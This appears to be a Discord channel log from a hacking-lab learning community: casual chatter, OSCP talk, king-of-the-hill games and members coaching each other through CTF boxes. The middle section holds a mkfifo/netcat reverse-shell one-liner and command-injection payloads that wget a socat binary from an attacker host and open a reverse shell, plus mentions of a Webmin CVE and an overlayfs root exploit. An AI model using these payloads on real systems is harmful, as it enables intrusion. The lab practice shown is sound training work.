#voice-chat

1 messages ยท Page 11 of 1

lofty moat
#

@quiet needle ma1ware is 13 .

#

he is planning to get oscp in another year or so

#

i believe he can do that easily.

quiet needle
#

Oh absolutely

#

I'm in awe

lofty moat
#

i am 23 and planning to get OSCP next year as well. after graduating.

#

wait BOF 40 points?

#

wasnt that 25 points

#

?

#

optional skipped bof and got 75 points and cleared his oscp

#

he also skipped those 5 points writeup

supple trellis
#
25 points machine
Two 20 points machines
10 points machine```i was wrong
lofty moat
#

thats what i was saying..

#

also 5 extra points so total is 105,

full jewel
#

how points many you need?

lofty moat
#

75

quiet needle
#

That's insanity

#

Dota 2 ๐Ÿคฎ

lofty moat
#

i unistalled Dota coz i wasted sooo much time on Dota.. 2766hours in 3 years.

supple trellis
full jewel
#

for most at least ...

lofty moat
#

@solid burrow never faced anything like this in teams. My teachers are noobs they didnt even setup the classes correctly. every student can join as a presenter.
So students mostly spend their time muting the teachers or kicking out other students out from the class.

solid burrow
#

its germany

#

what do you expect

lofty moat
#

oh also can i ask you some info about germany?

solid burrow
#

oh god sure

lofty moat
#

So i am planning to move out to some other country in like two or three years may be. i heard education in Germany is free, so i wanted to know how advanced Germany is in terms of infosec?

#

Muir stopped typing

solid burrow
#

very good

#

i mean you can google it but i can assure the eductaion is good

lofty moat
#

i mean you can google it but i can assure the eductaion is good
@solid burrow well i want to smh compare it. i dont have many options atm. havent even checked many either.so atm checking which country would be best to move out to. How would be the jobs and education there after getting OSCP thats what i was wondering about

#

I can hear you

#

i am 23 and will be getting OSCP next year. then i am looking for what to do next after it.. will google it myself

#

thanks for answering ๐Ÿ™‚

quiet needle
#

afk

lofty moat
#

Playing hackers koth

plucky vault
#

i call BS

buoyant plover
#

@latent nebula just ping the machine to see if it's up

latent nebula
#

@buoyant plover it doesn't respond to pings (ICMP blocked)

buoyant plover
#

@empty bone u miss typed the IP

#

@empty bone

#

...

empty bone
#

\ / ( ) { }

plucky vault
#

-Pn

latent nebula
#

nmap -Pn 10.10.149.126

empty bone
#

got ti

#

it*\

latent nebula
#

||gobuster dir -u <ip> -w /usr/share/wordlists/dirb/common.txt||

plucky vault
#

gobuster dir arguments -w this stands for wordlist -x this stands for extensions -t this stands for threads -u this stands for url you supply your url in here or ip address

empty bone
#

what am i suppost to be looking for?

crude void
buoyant plover
crude void
#

apt install

#

apt-get install

waxen cave
#

Please use the screenshot tool. ๐Ÿ™‚

crude void
#

@waxen cave i installed linux on my ps3

#

hahaha

forest python
fathom coyote
full sapphire
#

Go check your DMs @midnight fern

#

๐Ÿ˜

manic canyon
#

googles really fast

full sapphire
#

Which would be funny, if you hadn't done that yourself @midnight fern...

#

TeamViewer ID anyone? ๐Ÿ˜

fathom coyote
#

๐Ÿ‘€

full sapphire
#

Oi -- I seem to remember it being you needing help!

#

๐Ÿคฃ

#

As if you don't already have my full name!

#

James, Ryan, The admins

#

Yes he does

#

Oh you sneaky...

#

Para, let's gang up on him

fathom coyote
midnight fern
manic canyon
#

!rule 2

trim cloudBOT
#

Rule 2: No personal drama or drama from any other discord community is allowed to be brought into this discord. This is a space for infosec discussions and learning, keep it that way.

fathom coyote
#

!rule 15

trim cloudBOT
#

Rule 15: Please leave any disciplinary measures to the discord staff (Trial Mods, Mods, and Admins). This is also known as no 'mini-modding'. If something is happening, please just let the staff know and we can take care of it <3

midnight fern
forest python
#

Implicating muir too

full sapphire
#

Muri has objected to that name since the start

forest python
#

Muir, doesn't that count as corrupting a minor?

#

murri burri

full sapphire
#

Bugger off @midnight fern ๐Ÿ˜†

manic canyon
#

Flexing that you have friends

full sapphire
#

Muir, doesn't that count as corrupting a minor?
@forest python No, but getting him sh*tfaced might be...

#

Also, "more than your friends"?...

manic canyon
#

I know your last name itโ€™s โ€œumโ€!!

#

โ€œ0day-umโ€

#

I like a challenge but I like procrastinating even more

forest python
#

tfw you want software from somewhere and it doesn't build

quiet needle
#

Make your challenge procrastinating @manic canyon

full sapphire
#

Hey, I promised to swap you Pars' last name for yours!

manic canyon
#

Make your challenge procrastinating @manic canyon
@quiet needle Your Brain is too large for this server, Sir

#

Aight Iโ€™m gonna go to bed itโ€™s 2am and I gotta be up in 6 hours peace out people

quiet needle
#

Cyaaa lata

fathom coyote
#

Bye natic

#

Brainfuck is an esoteric programming language created in 1993 by Urban Mรผller, and is notable for its extreme minimalism.The language consists of only eight simple commands and an instruction pointer. While it is fully Turing complete, it is not intended for practical use, bu...

quiet needle
#

I will take that compliment and wear it on my sleeve (:

rustic mica
#

Oh bloody hell, I just realised that your pfp is Koan, James. Fantastic musical choice :D

fathom coyote
#

I was wondering wtf that said

rustic mica
#

Koan sound!

forest python
#

I haven't changed it since I got discord

#

1311 days ago

rustic mica
#

No need to tho. Koan kicks arse.

forest python
full sapphire
#

I can see him using Fetlang...

forest python
full sapphire
#

Then there's Monkshood

#

Which requires 100% scripting

fathom coyote
#
MS Paint Adventures Wiki

~ATH (pronounced "till death") is an esoteric programming language primarily geared towards imminently deceased programmers. The language exists on both Earth and Alternia. John Egbert and Karkat...

#

Reminds me of this

full sapphire
#

We do indeed ๐Ÿ˜

#

2000

forest python
#

20:00

full sapphire
#

Say 8 PM

#

Write 2000

plucky vault
#

It's military time

full sapphire
#

That's Britain in a nutshell

quiet needle
#

โ€œโ€˜Military timeโ€

full sapphire
#

We measure distance in centimetres, then miles

#

Miles per hour

#

Kilos

#

Just Britain

#

No, we definitely hate him...

#

Ryan, I shall murder you

#

Do I need to turn my damn mic on?

#

And yes, he is...

forest python
#

Ok I need a project name

full sapphire
#

Right. Bed time. Better luck next time @midnight fern ๐Ÿ˜

#

Nope. You will not

forest python
full sapphire
#

Bye! ๐Ÿ˜

plucky vault
#

On that note I should dissappear too

#

I shall return my friends

forest python
#

An illegal number is a number that represents information which is illegal to possess, utter, propagate, or otherwise transmit in some legal jurisdiction. Any piece of digital information is representable as a number; consequently, if communicating a specific set of informatio...

midnight fern
#
rename this file to command.bat
#

execute it

#

Will open CMD

fathom coyote
midnight fern
crude void
fathom coyote
gusty lichen
#

@rustic mica A fellow Koan sound fan. Good taste.

rustic mica
#

Of course! I fell in love the moment I head Sentient.

gusty lichen
#

indeed

rustic mica
#

Superb driving music, imo.

gusty lichen
#

im a dynasty fan myself

rustic mica
#

I don't blame you.

#

They reminded me of Noisia in a strange way.

gusty lichen
#

don't know them

#

I also like synthwave

#

ever heard of carpenter brut?

rustic mica
#

No, I haven't.

#

This is one of the best of Noisia, personally believe it to be, anyway.

#

Mantra is my favourite.

gusty lichen
#

its cool

upper path
#

@lofty moat staph it

#

Vote reset

lofty moat
#

....

upper path
#

There is no chance for others then

lofty moat
#

there are still ways in

warm atlas
#

shit need to open my vm

upper path
#

You fked ssh what other way?

lofty moat
#

find it

upper path
#

Nvm

#

You made this script?

lofty moat
#

nah

#

downloaded

upper path
#

Link

#

Or name

lofty moat
#

nyancat

#

well you can reset the box if you want

#

i dont mind

upper path
#

Already voted -_-

#

Read rule 7 of koth

lofty moat
#

๐Ÿคฆ

#

that most likely means autopwns.

#

that i am not using

quiet needle
#

that most likely means autopwns.
@lofty moat yes

upper path
#

It is making challenge hard

lofty moat
#

Scripts that automatically hack and/or harden the machine are forbidden
using nyancat is not against the rules

quiet needle
#

The nyancat script is okay as long as it doesnโ€™t crash the entire box

upper path
#

Fine : /

quiet needle
#

That would fall under rule 1 if it kills the box (:

fresh solar
#

I would recommend reading the rules and understanding them, before trying to contradict others.

warm atlas
#

cant ping

#

cant nmap

#

what i am gonna do

upper path
#

Dance

#

Dance with me

lofty moat
#

cant ping
@warm atlas you cant ping a windows machine

warm atlas
#

oh thats right

lofty moat
#

use -Pn for nmap scan

fresh solar
#

Windows firewall, by default blocks icmp requests.

warm atlas
#

use -Pn for nmap scan
@lofty moat ok thx

#

i only know how to deal with HTB shrek lol

solid burrow
#

so im still in fucking school but i will probably come on in aminute ro sometihng

upper path
#

GG @lofty moat

#

You still win buy I got some points

warm atlas
#

can you hear me? @solid burrow

#

king of the hill @solid burrow

#

KOTH

lofty moat
#

spamming wall wont help you ๐Ÿ™‚

upper path
#

๐Ÿคจ

lofty moat
#

i had to go to the kitchen for lunch

#

came back and saw reset and you wall in loop

#

but its just one command to bypass that

warm atlas
#

i have no idea how to use nmap for that

lofty moat
#

nmap -T4 -Pn ip

upper path
#

What is that command?

lofty moat
#

thats what you are supposed to find

warm atlas
#

gg

lofty moat
#

ggs

gritty thorn
#

KOTH now any one ?

solid burrow
#

here

full sapphire
#

Don't bother with -S @plucky vault

#

enum4linux $ip

plucky vault
#

oh

full sapphire
#

@plucky vault It gives you RCE

#

Bypassing the client side filter

#

Pinging yourself proves that it works

#

And yeah, you could technically write an exploit for it in Python

#

Total overkill though

jaunty topaz
#

wait what is that tun command

#

was that an alias?

full sapphire
#

It will be

#

Probably to ip a show tun0

plucky vault
#

ifconfig tun0

full sapphire
#

Or that ๐Ÿคทโ€โ™‚๏ธ

jaunty topaz
#

oh i haven't used ifconfig in ages

#

i'm a new boy

full sapphire
#

It's the old way

jaunty topaz
#

yeah

#

the ip sub commands make way more sense

plucky vault
#

ip a

full sapphire
#

Try it and see

jaunty topaz
#

try it instead of asking if it works :)

full sapphire
#

Good luck...

#

VIM!

#

Well done Elf!

#

I mean, still using your mouse, but could be worse

#

Oi, Cooctus, Elf's on Vim

#

Even if netcat was installed, that would not work with Ping in front of it now, would it?

#

Not unless you threw in the -c switch

plucky vault
#

ping -C 5 <ip that i forgot>;rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.11.7.100 1234 >/tmp/f ; echo "EHLO"

#

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.11.7.100 1234 >/tmp/f

#

you need to look at the HTTP response

#

yes

#

big hint || try outside the target ||

full sapphire
#

Eh?

#

How's that gonna work

plucky vault
#

{"target":"" HERE""}

full sapphire
#

That's inside the target parameter

#

Or, the value for it anyway

plucky vault
#

no HERE was quoted

full sapphire
#

Ironically you're on the right track with that though

#

Vaguely

plucky vault
#

{"target":"x"; xxxx""}

#

it looks like a blind RCE

full sapphire
#

๐Ÿ˜

#

Yes. It is a blind RCE

#

That might

#

But it's along the right lines

plucky vault
#

it doesn't error ๐Ÿ™‚

#

it's blind, how do you test a blind RCE

#

use tcpdump

#

you need an other revshell nc wont work i think

#

it gives an invalid character

#

yes that good

#

almost

#

use an ";"

#

{"target":"x"; command""}

#

there is a char you can't use in the command

full sapphire
#

Several

plucky vault
#

that sounds great

#

/ is allowed

#

it's not on pentestmonkey

#

| is not allowed

#

look at every command on thaat site

#

& is also blocked

#

i think

raw silo
#

oh that's a nice site

plucky vault
#

he's already on the right track

#

he's almost there

midnight fern
#

";

raw silo
#

lmaoo "netcat shells dont work, i'll just tell you that right now"

plucky vault
#

socat isn't on the box either

#

upload the socan binary

raw silo
#

What is this? just random ppl helping each other?

midnight fern
#

Yes

raw silo
#

impressive

#

lol this reminds me of the early days of programming classes

#

"little bit of copy, little bit of paste, and BAM!"

#

wget -q

#

ya

#

wget -q

midnight fern
#

wget -q -O /tmp/socat YOURIP/socat; etc

raw silo
#

then your stuff

#

the url should not be after -O

#

That's the output file

#

first test that you can actually download

#

-O is the output file

quasi rampart
#

python server has 8000 port
its not work
may be he should specify port number also

#

@plucky vault @midnight fern

plucky vault
#

this should work

quasi rampart
#

yes

plucky vault
#

OK

sand viper
#

why not just reversing then using socat with ez

plucky vault
#

0day deleted our commands, don't read the chat history

midnight fern
#

He has the correct command

#

they were deleted, so that other members can't just copy and paste.

#

You are also supposed to put a spoiler tag over any potential spoilers.

plucky vault
#

yeah that's fair. forgot it's a public chat

full sapphire
#

You are not tricking me into voice @midnight fern ๐Ÿคฃ

#

Right... ๐Ÿ˜›

plucky vault
#

muri come ๐Ÿ˜ญ

#

unmuting mic as mod should be illegal!

full sapphire
#

Muting or unmuting?

plucky vault
#

not toxic dude

proud pebble
#

@plucky vault is too much funny ๐Ÿ˜†

full sapphire
#

That stuff will kill yah @plucky vault

#

You too Ryan

sand viper
#

LOL call the fucking cops

proud pebble
#

kkkkkkkkk

plucky vault
#

it's in opt

full sapphire
#

Try Sudoing it

#

Given that was a permission error

#

@plucky vault

plucky vault
#

just install kali ๐Ÿ˜›

#

foxyproxy plugin

full sapphire
#

@worn hare could you mute your mic when you're not talking please? ๐Ÿ™‚

#

It's working

plucky vault
#

@plucky vault read the chat

sand viper
#

now you have to import the cert

full sapphire
#

Not for http you don't

#

Also, would someone remind me to unmute cash before I go to sleep please

proud pebble
#

CA it's just for https scenarios

sand viper
#

right, certs are just for https

plucky vault
#

IT'S WORKING, just press intercept off and reload the page

#

@midnight fern

#

now go to burp

#

turn it on

#

and go to the search php

full sapphire
#

@worn hare keep an eye on the server rules regarding DMs too please ๐Ÿ™‚
There will be a button on your mic, I'm sure. You can do it in Discord here though:

#

The button right next to your name

proud pebble
#

Wow i want a mod like @full sapphire in my server

#

hehe

plucky vault
#

no it won't loaD

#

go to burp now!

#

no VPN issue!

full sapphire
#

Wow i want a mod like @full sapphire in my server
@proud pebble What'd I do? ๐Ÿ˜†

plucky vault
#

@midnight fern

proud pebble
#

@proud pebble What'd I do? ๐Ÿ˜†
@full sapphire u're proficient

#

also patient

#

congrats

full sapphire
#

I try ๐Ÿคทโ€โ™‚๏ธ
Danke โ™ฅ๏ธ

plucky vault
#

why is het typing CCCCCCCCCCCCCCCCC

worn hare
#

@full sapphire , thanks I have done it.

full sapphire
#

@full sapphire , thanks I have done it.
@worn hare Thanks ๐Ÿ™‚
Just removed the server mute now ๐Ÿ‘

#

Gimme the command?

worn hare
#

Ok

plucky vault
#

the wget command is not right

proud pebble
#

Burp is on requirements.txt ๐Ÿ˜†

full sapphire
#

Elf send me that

plucky vault
#

|| {"target":"";wget -q http://10.11.7.100:8000/socat -O /tmp/socat; chmod +x /tmp/socat; /tmp/socat exec: bash -li bash,pty,stderr,setsid,sigint,sane tcp:10.11.7.100:1337; echo""}||

sand viper
#

im just curious why dont you guys rev a shell then use socat ?

full sapphire
#

So, who failed? ๐Ÿ˜

proud pebble
#

lol

full sapphire
#

im just curious why dont you guys rev a shell then use socat ?
@sand viper I deliberately filtered most of the special characters you'd need in a reverse shell

#

|| {"target":"";wget -q http://10.11.7.100:8000/socat -O /tmp/socat; chmod +x /tmp/socat; /tmp/socat exec: bash -li bash,pty,stderr,setsid,sigint,sane tcp:10.11.7.100:1337; echo""}||
@plucky vault Think you'll need a few more quotes and backslashes -- but I'll be interested to see if it works

sand viper
#

@sand viper I deliberately filtered most of the special characters you'd need in a reverse shell
@full sapphire i think i did reverse a shell

full sapphire
#

@full sapphire i think i did reverse a shell
@sand viper Did you do it before or after I patched it?

plucky vault
#

||{"target":"";wget -q http://10.11.7.100:8000/socat -O /tmp/socat; chmod +x /tmp/socat; /tmp/socat exec: bash -li bash,pty,stderr,setsid,sigint,sane tcp:10.11.7.100:1337; echo""}||

#

sorry

proud pebble
#

check your ip elf

#

arp -a

full sapphire
#

||{"target":"\";wget -q http://10.11.7.100:8000/socat -O /tmp/socat; chmod +x /tmp/socat; /tmp/socat exec:\"bash -li\" bash,pty,stderr,setsid,sigint,sane tcp:10.11.7.100:1337; echo \""}||
@plucky vault

proud pebble
#

the 0.0.0.0 == localhost

#

u don't need to worry about it

#

-p

#

use -p [port]

sand viper
#

@sand viper Did you do it before or after I patched it?
@full sapphire oh so there is a patch, didnt know about that, i'll try to reverse for sure, hhhh, @full sapphire : good luck with that

full sapphire
#

Yeah, I killed lxc and smbpasswd as unintendeds

#

And fixed a typo in the search script...

plucky vault
#

python3 -m http.server 8000

full sapphire
#

You do for 8000

plucky vault
#

sudo only for 0-1024

full sapphire
#

Pretty sure

proud pebble
#

What box he was trying to do?

plucky vault
#

year of the fox

proud pebble
#

tks

full sapphire
#

Now you're gonna have to do it again @midnight fern

#

New PC

sand viper
#

yo @midnight fern , any hint on that jeff, i got the pass, is it a sub somwhere ?

full sapphire
#

It involves Java

#

You're wrong

#

๐Ÿ˜

#

(Burpsuite is beautiful though)

#

Also, no you would not

#

@plucky vault No WSL

#

Not for network stuff

plucky vault
#

its working

#

i think

sand viper
#

yeah a subdomain

#

u mean the zip zop zap file

plucky vault
#

okay i know how to setup burp now

proud pebble
#

do u'll nevr forget

#

hehe

plucky vault
#

technical problems.

#

i forgot the password

#

what is username xD

sand viper
#

yeah i think its the other computer in the other room

#

oh ok

plucky vault
#

the wget command is still wrong @midnight fern @plucky vault

warm atlas
#

@midnight fern can you help me with my yea of the fox too?

#

sry for ping tho

proud pebble
#

why they don't try curl -O, how as alternative from wget

sand viper
#

02:12:19 AM +01
good luck guys, i'll go have some sleep

proud pebble
#

maybe can work

#

take care

plucky vault
#
hak@:~/Downloads$ ls
google.com
#

the wget command is still wrong @midnight fern @THM's Official Elf

#

it sould be wget IP/socat -O /tmp/socat

#

im here

#

oh

#

i know

#

why

#

its not

#

getting it

#

so. im using burp from windows right?

#

but my python3 http.server is setup on wsl

#

along with a socat thing

#

5 sec

#

ok this should work

#

no

#

its not working ๐Ÿ˜ญ

#

just install kali in VM

#

i'm going to bed

#

wget flails because you don't got wright permissions

#

it will fail anyway

#

im gonna go eat xD

#

okay

#

im gonna be back in like 1 hour

#

xD

fresh solar
#

๐Ÿ‘€

tawdry cypress
#

lol

tame ether
#

it's easy to do

#

you don't even need to set up the vcan kekw

#

i have it finished, I was doing it one night with kris

muted sand
#

!dark

trim cloudBOT
#
DarkStar7471
*sigh* What do you want.
tame ether
#

let's use kotlin

muted sand
#

no

#

lets use PHP

midnight fern
tame ether
#

ouch

muted sand
tame ether
#

php

muted sand
#

PHP >

tame ether
#

i remember ts3 bots in php

#

java bad, kotlin good

midnight fern
#

Kotlin Bad

#

Smali Bad

#

Android BAD

tame ether
#

kotlin is not only android :(

jaunty topaz
#

where's the party ๐Ÿ˜”๐ŸคŸ

latent nebula
#

is this minecraft dungeons?

#

pretty epic

sand agate
#

is that minecraft?

#

oh alright

#

looks nice

#

nice to meet you btw

real orbit
#

boing boing boing

fast wind
#

lol

real orbit
#

boing boing boing

#

boing psst clpew

#

boing boing boing boing boing boing boing

#

๐Ÿ‘€

#

hack the mainframe

muted sand
real orbit
#

i should really get out of bed so i can do adult stuff like go to costco

muted sand
#

Imagine still being in bed at 5pm

real orbit
#

nice try, its 12pm kekw

#

throwback to that one advanced+ box cheese did :L

muted sand
#

12 pm kekw its 5pm mate

real orbit
muted sand
#

Your clock is lying to you

real orbit
#

lies

upper path
#

Rockets right in the arse

lyric horizon
#

what are we playing

sand agate
#

gta 6

lyric horizon
#

@marble cape Is this the Minecraft ARPG?

polar raven
#

Why is it minecraft themed?

abstract raft
#

why can't I unmute myself?

#

I am

lofty moat
#

what did i miss here?

full sapphire
#

Number of times I've had to fix your damn Python2 smh

#

Also, isn't ES6 current @midnight fern?

#

It's deprecated

#

Also, to be fair, the number of exploits written in Python2 is crazy

#

It's really good for BoF still

#

Sending data around is a lot easier with python2 as well

midnight fern
#

Sending data around is a lot easier with python2 as well
@full sapphire Agreed

full sapphire
#

Aw โ™ฅ๏ธ

#

๐Ÿคฎ

#

๐Ÿคฎ ๐Ÿคฎ

#

๐Ÿคฎ

#

Nope

#

Also, the vomit was for Trump

#

Ironically

#

I hate Salad

#

Ryan, I will murder you ๐Ÿ˜†

#

You are not going to trick me into joining Voice

#

๐Ÿ˜

#

26000

midnight fern
#

26000
@full sapphire the 2600hz tone is legendary

#

Itโ€™s a sign

#

Google it

full sapphire
#

smh

#

You had it

#

You were off your feet for weeks

#

You had it

warm atlas
#

ayyyy

#

diabolo

full sapphire
#

Gotcha first ๐Ÿ˜

#

Also, can you server mute me?

#

Try it

midnight fern
#

@full sapphire join back

#

I donโ€™t have the option unless youโ€™re in VC

full sapphire
#

@midnight fern uh, sure, just heading to bed ๐Ÿ˜†

midnight fern
#

Did it work?

full sapphire
#

Yep. I just unmuted myself though ๐Ÿคทโ€โ™‚๏ธ

#

I wonder if you can mute Dark...

#

"Is my mic broken, is everyone ignoring me?"

plucky vault
#

Oh my god yes

#

@midnight fern hack twitch and mute his stream

full sapphire
#

True...

#

Don't say that

#

He genuinely might

midnight fern
#

Iโ€™m taking his Twitch tonight and Iโ€™m streaming some really off the wall stuff.

plucky vault
#

whats da channel for da live?

Iโ€™m taking his Twitch tonight and Iโ€™m streaming some really off the wall stuff.
@midnight fern

midnight fern
#

whats da channel for da live?
@midnight fern
@plucky vault LoL Iโ€™m not serious

plucky vault
#

ahh you goof ๐Ÿ™ˆ

warm atlas
#

hm hm?

#

finaly

#

level 9

#

Whats the method to exploit the system for privilege escalation called?
in lord of the root lol i donno what is it

#

@midnight fern

midnight fern
#

Whats the method to exploit the system for privilege escalation called?
in lord of the root lol i donno what is it
@warm atlas

Exploit Title: overlayfs local root

Date: 2016-01-05

warm atlas
#

oh tyty

warm atlas
#

hello

#

oddrabbit

#

hewwo

limber lichen
#

shhh

#

I am trying to concentrate here

lofty moat
#

we love Elf's streams โค๏ธ

muted sand
#

is elf streaming/

lofty moat
#

That background is made by CMNatic @livid crag

#

@plucky vault try using
python2 CVE $ip:10000 whoami

#

@plucky vault put the right port also cmd = command

#

@plucky vault I THINK IN TASK 2 you were supposed to find the user and put it in /etc/hosts as well ?

forest python
#

nmap -sV -v -p 10000

plucky vault
#

where on discord

valid night
#

Love a good Elf stream

plucky vault
#

ys

#

thank you

muted sand
livid crag
#

my head doesn't just ache, it's bleeding out one ear

buoyant lichen
plucky vault
#

don't worry

#

you will be fine

muted sand
#

When elf hacks, he doesn't smash his head against his keyboard.... everybody else does

manic canyon
#

Tsk, he doesn't know the meta

valid night
#

This is beyond expectations

manic canyon
#

There's about 20 people

#

Just listening

valid night
#

When elf hacks, he doesn't smash his head against his keyboard.... everybody else does
@muted sand I like Kris is head bashing his keyboard rn

muted sand
#

hahaha

#

why doesn't he just run it though burp and do it manually

#

or curl

manic canyon
#

Hey 0day :D

plucky vault
#

sorry if im yelling

#

i have bad mic

#

okay

#

i i think i know why its not working

#

10000/tcp open http MiniServ 1.890 (Webmin httpd)

#

the version

#

is not

#

1.920

#

its not 1.890

#

YES

#

haahahahah

#

test

livid crag
#

๐Ÿบ

rotund drum
#

Btw I use arch too

valid night
tame ether
#

cat gif time

manic canyon
#

woof

valid night
manic canyon
#

Uhhhhhhh

valid night
plucky vault
#

@livid crag im gonna go download parrot os

valid night
#

I need to change back to polite cat

plucky vault
#

parrot security

plucky vault
#

nobody likes kali

#

jk

buoyant lichen
#

WTH

plucky vault
#

im gonna use

#

black arch

valid night
#

MacOS debian ๐Ÿ˜‰

buoyant lichen
#

who's mean to parrot os

tame ether
#

what's the matter swa GWcorbinTopKek

livid crag
#

dyem faiteng wurdz

cursive herald
#

I use Arch btw

tame ether
#

both kali and parrot suck because they have tools you'll probably never use darkchamp

#

use any distro you like and install the tools you need

summer cloud
#

Elf download Debian like a normal person

#

SMH

cursive herald
#

Imagine using tools pre-built for you. Real hackers create their own tools

plucky vault
#

@summer cloud i used debian before

buoyant lichen
#

just make a custom OS out of some template

#

lol

tame ether
#

lmao

#

suse studio

buoyant lichen
#

bruuh

summer cloud
#

Then you know how good of a distro it is

plucky vault
#

it truly si

cursive herald
#

I wrote mine in HolyC. Holy Kali. Now I have the power of God & Anime on my side.

plucky vault
#

is *

#

i used to play csgo on debian

tame ether
#

suse studio was awesome

plucky vault
#

best experiance ever

tame ether
#

your own distro in minutes

plucky vault
#

(csgo can be played on linux)

#

yes

keen perch
#

do u guys really play games on linux?

rotund drum
#

csgo even has better fps on linux

#

on pop os tho

tame ether
#

yes

plucky vault
#

i used to play minecraft and runescape

tame ether
#

they work well

cursive herald
#

on vc?

#

or something

tame ether
#

i can't get all games to work but most of the big ones work well

cursive herald
#

chanting?

valid night
#

This is painful to watch

orchid yoke
#

@keen perch mute that mic! ๐Ÿ˜ฎ

valid night
#

This stream is killing our IQ

plucky vault
#

its not working

#

i need my own internet

#

this is why i need to wait till i get my own internet

valid night
#

Imagine being a hacker and showing everyone your password

cursive herald
#

Is your ISP blocking metasploit?

plucky vault
#

no

#

my internet is bad

#

everybody is connected rn

tame ether
#

they have an elf filter in place

buoyant lichen
#

small bandwidth ?

plucky vault
#

yes

cursive herald
#

Can you set priority to yourself on your router?

plucky vault
#

i can't its not my internet

#

its my neighbors

cursive herald
#

What

tame ether
#

wait what

cursive herald
rotund drum
#

lol

cursive herald
plucky vault
#

๐Ÿ˜ฆ

tame ether
#

elf

cursive herald
#

Like....

#

Did you hack their wifi?

#

or did they give it to you?

tame ether
#

tell me that you have the connection legitimately

rotund drum
#

maybe open network

valid night
#

its my neighbors
@plucky vault kekw

cursive herald
#

Open network still illegal :L

plucky vault
#

i asked them

#

properly

cursive herald
#

Ah nice

buoyant lichen
#

lol

cursive herald
#

in which case setting priority would be considered a dork move

tame ether
#

wait elf you are still a sub right?

buoyant lichen
#

can i use your wifi to hack CIA

plucky vault
#

but then i gotten in good mood and gave my mother password for wifi

#

and then she told the password to whole neigborhood

#

really nice

tame ether
#

jesus

cursive herald
#

What

valid night
#

Can we get access too?

cursive herald
#

So you have like 60 people on the same network?

#

Your mother broke the law

#

I'm going to call the FBI

plucky vault
#

no i have like 10

orchid yoke
#

Hack 'em.. Hack 'em all!

livid crag
valid night
#

Bruteforce the answer, it's only 2 digits

rotund drum
#

lol his stream has like 2 min delay

plucky vault
#

im gonna deploy kali linux machine

#

cuz this is pointless

#

@livid crag kali linux bare metal or parrot security bare metal?

livid crag
#

Just please stop and stop

plucky vault
#

stop where

midnight fern
sand agate
#

@keen perch

#

look at the stream

plucky vault
#

noo ๐Ÿ˜‚

#

im not pissed of

#

i was yelling cuz in my house everybody was yelling

#

so i coudn't hear my self

#

so thats why i was yelling

#

sry if i offended anybody tho

sand agate
#

you can just ssh into it

plucky vault
#

i mean

#

i can

#

but i will download kali linux

midnight fern
#

Elf you're finally making the best decision of your life.

plucky vault
#

yes ๐Ÿ˜‚

#

show what ?

#

wait can you type it

#

this windows

#

ok this is downloading

#

i live in city

#

@summer cloud its interpreter not compiler

#

kekw

#

serbia

#

yes

plucky vault
#

test

midnight fern
#

test
@plucky vault testing

plucky vault
#

yes ๐Ÿ˜‚

#

hmm

#

i wonder can i shred wsl

#
rm: cannot remove '/mnt/c/$Recycle.Bin/S-1-5-18': Permission denied
rm: cannot remove '/mnt/c/$Windows.~WS/Sources/Panther/Eula.rtf': Permission denied
rm: cannot remove '/mnt/c/bootmgr': Permission denied
rm: cannot remove '/mnt/c/BOOTNXT': Permission denied
^C```
#

did i just accedently delete my c ?

#

NO

#

omg

#

it deleted stuff from my c

#

inside wsl

#

why...

#

jesus

#

i have arch on usb.

#

i need to download random distro rn

#

no i mean for this pc

#

it shreded the stuff out of wsl

tame ether
#

jfc elf

#

i disappear for a moment

#

and you shred your drive again

plucky vault
#

it wasn't intentional

#

i wanted to shred wls

#

wsl

#

but i think i deleted my windows

#

or something

#

its missing a game

#

and im pretty sure i didn't delete it

#

G'day fellow 1337 hackers.

#

i didn't delete league

#

thank god

#

in powershell
wsl --list

#

wsl --unregister kali-linux

#

lxrun /uninstall

#

i kinda deleted it

#

i think

#

but not completely

#

i stoped cuz i almost deleted everything on main thing

#

yeah it's f*kd

#

do you guys want to watch me play league ?

#

we wan't to see you try hacking

#

that will have to wait till i get better internet sadly ๐Ÿ˜ญ

#

apperently they are coming tommarow to set it up

#

they keep reschedualing it

#

but soon i hope

#

if its tommarow

#

then i can do crazy stuff

#

Who would like a list of interesting compromised IPs?

#

is 127.0.0.1 on it?

#

No.

#

@plucky vault please don't

#

I haven't compromised them.

#

They were attacking my friend account.

manic canyon
#

No illegal talk

plucky vault
#

So they were probably part of a botnet.

#

@forest python

manic canyon
#

Even if they were doing something bad doesnโ€™t mean youโ€™re allowed to do something worse

plucky vault
#

I'm not.

#

It's just a scan.

forest python
#

@plucky vault Oi

#

Behave.

#

Be warned.

plucky vault
#

yah im gonna leave vc..

#

@fossil estuary and everyone else see you guys later ๐Ÿ˜„

keen perch
#

see u Elf it was nice to see u n thank u for he assembly tip

plucky vault
#

Elf is my favourite file format.

waxen cave
#

Format is my favorite elf.

#

๐Ÿ’ช

keen perch
#

morning all

#

is @plucky vault going live anytime soon?

plucky vault
#

@keen perch not yet i just woke up i gotten new tv channels but still router didnt ship so today or tommarow

keen perch
#

ok ok got u bro

#

live yesterday was nice

#

so i'll be ready for your next live

plucky vault
#

Thanks hahaha

sweet vapor
#

could someone jump on voice chat with me?

late cliff
#

Yo

warm atlas
#

ayyyy

#

sky net

#

a fun one

unique harbor
#

miles*

warm atlas
#

@plucky vault bye have fun gtg

unique harbor
#

It's smbget I guess

#

U need to specify the IP not just the alias

#

@plucky vault

keen perch
#

aloha

#

anyone to go live with me to help me out on the last challenge on Intro to Assembly x86-64? please?

keen perch
#

@forest python u there mate?

forest python
#

@keen perch No.

#

Don't just tag me when you need help

#

Everyone who helps is a volunteer

#

I saw your request, and I didn't answer because I can't help

keen perch
#

I'm sorry sir. really sorry it wont happen again.

#

pardon me

shadow pier
#

hello

#

i have a question

#
echo '/bin/sh' > cat
bash: cat: Permission denied
#

i try with

echo "/bin/sh" > cat  
bash: cat: Permission denied
#

but doesn't work

midnight fern
#

What room are you on @shadow pier

plucky vault
#

Who is Ashu?

#

Why is he the Admin?

#

Isn't Skiddy?

manic canyon
#

Ashu Skidy Dark All developed/created THM

plucky vault
#

Oh okay. Why aren't they all in that section?

#

I only see Ashu.

manic canyon
#

They are

#

Dark and Skidy are offline

#

..

plucky vault
#

I thought it was suppose to show everyone regardless if they were online or not.

manic canyon
#

Nope

#

Thereโ€™s more than 5 mods also

plucky vault
#

Yeah, Ponspector's not there.

manic canyon
#

